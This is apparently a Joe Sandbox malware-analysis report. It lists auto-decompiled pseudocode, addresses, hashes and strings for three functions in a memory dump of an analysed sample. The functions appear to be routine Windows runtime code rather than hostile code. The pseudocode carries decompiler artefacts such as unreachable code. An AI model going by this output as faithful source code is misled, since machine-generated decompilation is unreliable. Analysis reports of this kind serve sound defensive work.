Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c231cde34b5bea1ac9d3772565992ffc769cdb42ffa2c6d8fae5e752abe2ce2f
Instruction ID: 3ddb6d6a8627044d53f2c9bf8e7b656a53c2f5e60068355dc2e257369d5f7d8c
Opcode Fuzzy Hash: c231cde34b5bea1ac9d3772565992ffc769cdb42ffa2c6d8fae5e752abe2ce2f
Instruction Fuzzy Hash: E511E1313206079BC761AF2CCDC5AABB7E5BBC4754F00052CEA41976A1DB60ED14C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 0127FAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0127FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0125EEF0(0x1337b60);
					_t134 =  *0x1337b84; // 0x77997b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1337b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1337b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01256D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E012576E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E012E8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0124B150();
													}
													_t116 = E012E6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E012575CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1338638; // 0x0
																	_t122 = L012538A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E012576E2(_t154);
																			goto L41;
																		}
																	} else {
																		E012576E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0127FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L012570F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0127FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0127FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0127FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0127FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0127FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1337b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1337b84 = _t75;
						_t73 = E0125EB70(_t134, 0x1337b60);
						if( *0x1337b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0125FF60( *0x1337b20);
							}
						}
						goto L5;
					}
				}
			}

0x0127fab0
0x0127fab2
0x0127fab3
0x0127fab4
0x0127fabc
0x0127fac0
0x0127fb14
0x0127fb17
0x0127fac2
0x0127fac8
0x0127facd
0x0127fad3
0x0127fad3
0x0127fadd
0x0127fb18
0x0127fb1b
0x0127fb1d
0x0127fb1e
0x0127fb1f
0x0127fb20
0x0127fb21
0x0127fb22
0x0127fb23
0x0127fb24
0x0127fb25
0x0127fb26
0x0127fb27
0x0127fb28
0x0127fb29
0x0127fb2a
0x0127fb2b
0x0127fb2c
0x0127fb2d
0x0127fb2e
0x0127fb2f
0x0127fb3a
0x0127fb3b
0x0127fb3e
0x0127fb41
0x0127fb44
0x0127fb47
0x0127fb4a
0x0127fb4d
0x0127fb53
0x012bbdcb
0x012bbdcb
0x0127fb59
0x0127fb5b
0x0127fb5b
0x0127fb5e
0x012bbdd5
0x012bbdd8
0x00000000
0x012bbdda
0x00000000
0x012bbdda
0x0127fb64
0x0127fb64
0x0127fb64
0x0127fb67
0x0127fb6e
0x0127fb70
0x0127fb72
0x00000000
0x0127fb78
0x0127fb7a
0x0127fb7a
0x0127fb7d
0x0127fb80
0x012bbddf
0x012bbde1
0x00000000
0x012bbde3
0x00000000
0x012bbde3
0x0127fb86
0x0127fb86
0x0127fb86
0x0127fb8b
0x0127fb90
0x0127fb92
0x0127fb94
0x0127fb9a
0x0127fb9b
0x0127fba1
0x012bbde8
0x012bbdeb
0x012bbded
0x012bbeb5
0x012bbeb5
0x012bbebb
0x012bbebd
0x012bbec3
0x012bbed2
0x012bbedd
0x012bbedd
0x012bbeed
0x00000000
0x012bbdf3
0x012bbdfe
0x012bbe06
0x012bbe0b
0x012bbe0d
0x012bbe0f
0x012bbe14
0x012bbe19
0x012bbe20
0x012bbe25
0x012bbe27
0x012bbe35
0x012bbe39
0x012bbe46
0x012bbe4f
0x012bbe54
0x012bbe56
0x012bbef8
0x012bbef8
0x00000000
0x012bbe5c
0x012bbe5c
0x012bbe60
0x00000000
0x012bbe66
0x012bbe66
0x012bbe7f
0x012bbe84
0x012bbe87
0x012bbe89
0x012bbe8b
0x012bbe99
0x012bbe9d
0x012bbea0
0x012bbeac
0x012bbeaf
0x012bbeb1
0x012bbeb3
0x012bbeb3
0x00000000
0x012bbea2
0x012bbea2
0x00000000
0x012bbea2
0x012bbe8d
0x012bbe8d
0x012bbe92
0x00000000
0x012bbe92
0x012bbe8b
0x012bbe60
0x012bbe3b
0x012bbe3b
0x012bbe3e
0x00000000
0x012bbe40
0x012bbe40
0x012bbe44
0x00000000
0x00000000
0x00000000
0x00000000
0x012bbe44
0x012bbe3e
0x012bbe29
0x012bbe29
0x00000000
0x012bbe29
0x012bbe27
0x00000000
0x0127fba7
0x0127fba7
0x0127fbab
0x012bbf02
0x0127fbb1
0x0127fbb1
0x0127fbb8
0x0127fbbd
0x0127fbbd
0x0127fbbf
0x0127fbbf
0x0127fbc5
0x0127fbcb
0x0127fbf8
0x0127fbf8
0x0127fbfa
0x00000000
0x0127fc00
0x0127fc00
0x0127fc03
0x00000000
0x0127fc09
0x0127fc09
0x0127fc0f
0x0127fc15
0x0127fc23
0x0127fc23
0x0127fc25
0x0127fc27
0x0127fc75
0x0127fc7c
0x0127fc84
0x00000000
0x0127fc29
0x0127fc29
0x0127fc2d
0x0127fc30
0x012bbf0f
0x00000000
0x0127fc36
0x0127fc38
0x0127fc3b
0x0127fc41
0x012bbf17
0x012bbf19
0x012bbf48
0x012bbf4b
0x00000000
0x012bbf1b
0x012bbf22
0x012bbf24
0x012bbf26
0x00000000
0x012bbf2c
0x012bbf37
0x012bbf39
0x012bbf3b
0x00000000
0x012bbf41
0x012bbf41
0x012bbf41
0x012bbf41
0x012bbf45
0x00000000
0x012bbf45
0x012bbf3b
0x012bbf26
0x00000000
0x0127fc47
0x0127fc47
0x0127fc49
0x0127fcb2
0x0127fcb4
0x0127fcb6
0x0127fcdc
0x0127fcdc
0x00000000
0x0127fcb8
0x0127fcc3
0x0127fcc5
0x0127fcc7
0x00000000
0x0127fcc9
0x0127fcc9
0x0127fccd
0x00000000
0x0127fccd
0x0127fcc7
0x00000000
0x0127fc4b
0x0127fc4b
0x0127fc4e
0x0127fc4e
0x0127fc51
0x0127fc51
0x0127fc54
0x0127fc5a
0x0127fc5c
0x0127fc5f
0x0127fc61
0x0127fc63
0x0127fc65
0x0127fc67
0x0127fc6e
0x0127fc72
0x0127fc72
0x0127fc72
0x0127fc72
0x0127fc67
0x0127fc61
0x00000000
0x0127fc5a
0x0127fc49
0x0127fc41
0x0127fc30
0x0127fc27
0x0127fc03
0x0127fbcd
0x0127fbd3
0x0127fbd9
0x0127fbdc
0x0127fbde
0x0127fc99
0x0127fc9b
0x0127fc9d
0x0127fcd5
0x0127fcd5
0x0127fc89
0x0127fc89
0x00000000
0x0127fc9f
0x0127fc9f
0x0127fca3
0x00000000
0x0127fca3
0x00000000
0x0127fbe4
0x0127fbe4
0x0127fbe4
0x0127fbe4
0x0127fbe9
0x0127fbf2
0x00000000
0x0127fbf2
0x0127fbde
0x0127fbcb
0x0127fbab
0x0127fc8b
0x0127fc8b
0x0127fc8c
0x0127fb80
0x0127fb72
0x0127fb5e
0x0127fc8d
0x0127fc91
0x0127fadf
0x0127fadf
0x0127fae1
0x0127fae4
0x0127fae7
0x0127faec
0x0127faf8
0x0127fb00
0x0127fb07
0x0127fb0f
0x0127fb0f
0x0127fb07
0x00000000
0x0127faf8
0x0127fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 012BBE0F

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 4fd0d9f2f4f93b0a88db12773fd5ee0c4dacd799e282de5818086ccb02caf685
Instruction ID: 17340f02ca880736bf4a3aa13b0f1a0125884e1b6732d063944d1540d6d7fe27
Opcode Fuzzy Hash: 4fd0d9f2f4f93b0a88db12773fd5ee0c4dacd799e282de5818086ccb02caf685
Instruction Fuzzy Hash: C1A10471B246078BEB25CF68C590BBBB7A4AF48710F04456DEB26DB690EB74D841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01242D8A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E01242D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1335350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1337bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E012897C0();
				}
				if( *0x13379c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x13379c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01271624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01267D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E012DFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01289520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0127E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								E0129DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1336901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1336901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01289980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E012895D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01267D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01267D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E012C7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E012DFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1335350;
							if(_t109 != 0x1335350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E012DFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E012D5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x01242d8a
0x01242d8a
0x01242d92
0x01242d96
0x01242d9e
0x01242da0
0x01242da3
0x01242da5
0x01242da8
0x01242dab
0x01242db2
0x0129f9aa
0x0129f9ab
0x0129f9ae
0x0129f9ae
0x01242db8
0x01242dc2
0x0129f9b9
0x0129f9be
0x0129f9bf
0x0129f9bf
0x01242dcf
0x0129f9c9
0x01242dd5
0x01242dd5
0x01242dd5
0x01242dde
0x01242de1
0x01242e70
0x01242e72
0x01242e72
0x01242de7
0x01242deb
0x01242e7c
0x01242e83
0x01242e85
0x01242e8b
0x01242e8d
0x01242e92
0x01242e92
0x01242e85
0x01242df1
0x01242df7
0x01242df9
0x01242df9
0x01242dfc
0x01242dff
0x01242e02
0x00000000
0x01242e05
0x01242e0c
0x0129f9d9
0x01242e12
0x01242e12
0x01242e12
0x01242e1a
0x0129f9e3
0x0129f9e9
0x0129f9f0
0x0129f9f6
0x0129f9f8
0x0129f9f8
0x0129f9f0
0x01242e23
0x0129fa02
0x0129fa03
0x0129fa05
0x0129fa06
0x00000000
0x01242e29
0x01242e29
0x01242e2e
0x01242e34
0x01242e3e
0x00000000
0x00000000
0x01242e44
0x01242e47
0x01242e4d
0x00000000
0x00000000
0x01242e4f
0x01242e54
0x00000000
0x00000000
0x01242e5a
0x01242e5f
0x01242e9a
0x01242ea4
0x01242ea5
0x01242ea8
0x01242eaf
0x01242eb2
0x01242eb5
0x0129fae9
0x0129faeb
0x0129faed
0x0129faef
0x0129faf7
0x0129faf8
0x0129fafd
0x0129faff
0x0129fb04
0x0129fb04
0x0129faff
0x01242ec0
0x01242ec4
0x01242ec6
0x01242ec8
0x0129fb14
0x0129fb18
0x0129fb1e
0x0129fb21
0x0129fb21
0x01242ece
0x01242ece
0x01242ece
0x01242ed7
0x01242e61
0x01242e63
0x0129fa6b
0x0129fa71
0x0129fa76
0x0129fa78
0x0129fa8a
0x0129fa7a
0x0129fa83
0x0129fa83
0x0129fa8f
0x0129fa91
0x0129fa97
0x0129fa9d
0x0129faa4
0x0129faaa
0x0129faaf
0x0129fab1
0x0129fac3
0x0129fab3
0x0129fabc
0x0129fabc
0x0129fac8
0x0129facb
0x0129fadf
0x0129fadf
0x0129facb
0x0129faa4
0x0129fa91
0x01242e6f
0x01242e6f
0x01242e5f
0x0129fa13
0x0129fa15
0x0129fa17
0x0129fa1f
0x0129fa21
0x0129fa22
0x0129fa25
0x0129fa28
0x0129fa2f
0x0129fa2f
0x0129fa2a
0x0129fa2a
0x0129fa2a
0x0129fa31
0x0129fa34
0x0129fa36
0x0129fa3c
0x0129fa3e
0x0129fa41
0x0129fa43
0x0129fa45
0x0129fa45
0x0129fa41
0x0129fa3c
0x0129fa4a
0x0129fa4f
0x0129fa51
0x0129fa53
0x0129fa56
0x0129fa5b
0x0129fa5e
0x00000000
0x0129fa5e
0x01242e23

Strings

RTL: Re-Waiting, xrefs: 0129FA4A

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 576ab544678e779c8116462a957e813375f2a163ff0a194a2997156aa2c1a83d
Instruction ID: 51b37dbcaf0aa04cbae41ef708e0270eab57c340437bc322c075a2394621e2f4
Opcode Fuzzy Hash: 576ab544678e779c8116462a957e813375f2a163ff0a194a2997156aa2c1a83d
Instruction Fuzzy Hash: 4E615331B20606EFEF36DF6DD980B7E7BA4EB44724F1406A9EA11D72C1C778A9008791

Uniqueness

Uniqueness Score: -1.00%

Function 01310EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01310EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0130FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01311074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01289730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0130A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0130A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1338b04 >> 0x14) + (_v44 -  *0x1338b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01267D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0130138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01267D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E012FFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1338724 & 0x00000008) != 0) {
						E013052F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E013115B5(0x1338ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x01310eb7
0x01310eb9
0x01310ec0
0x01310ec2
0x01310ecd
0x0131105b
0x0131105b
0x01311061
0x01311066
0x01311066
0x0131106b
0x01311073
0x01311073
0x01310ed3
0x01310ed6
0x01310edc
0x01310ee0
0x01310ee7
0x01310ef0
0x01310ef5
0x01310efa
0x01310efc
0x01310efd
0x01310f03
0x01310f04
0x01310f06
0x01310f07
0x01310f09
0x01310f0e
